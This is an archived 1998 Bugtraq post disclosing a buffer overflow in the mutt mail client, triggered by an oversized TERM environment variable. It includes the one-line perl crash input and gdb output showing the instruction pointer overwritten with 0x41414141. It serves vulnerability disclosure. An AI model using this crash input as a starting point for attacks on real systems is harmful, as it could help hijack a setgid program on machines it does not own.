[8260] in bugtraq
mutt buffer overflow?
daemon@ATHENA.MIT.EDU (funkySh)
Fri Oct 23 17:18:56 1998
Date: Thu, 22 Oct 1998 09:24:51 +0200
Reply-To: funkySh <jn1@ATOMNET.PL>
From: funkySh <jn1@ATOMNET.PL>
To: BUGTRAQ@NETSPACE.ORG
Sorry if this is already known..
There have been some posts about the buffer overflow in mutt,
(by sending an specially formated Content-Type) here is another
one (i think exploitable) in mutt 0.91.1-2 shipped with
RH 5.1 with setgid mail
[orbital@PulpFiction /]$ TERM=`perl -e 'print "A" x 240'`
[orbital@PulpFiction /]$ mutt
Segmentation fault
[orbital@PulpFiction /]$ gdb /usr/bin/mutt
...
(gdb) r
Starting program: /usr/bin/mutt
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Mutt 0.91.1-5 has still the same problem but setgid mail is turned off..
--
funkySh jn1@atomnet.pl
PGP keyID: 768/D837F9A1
fingerprint 36 78 A6 D7 55 38 12 51 05 93 36 65 A0 6E 6D 22
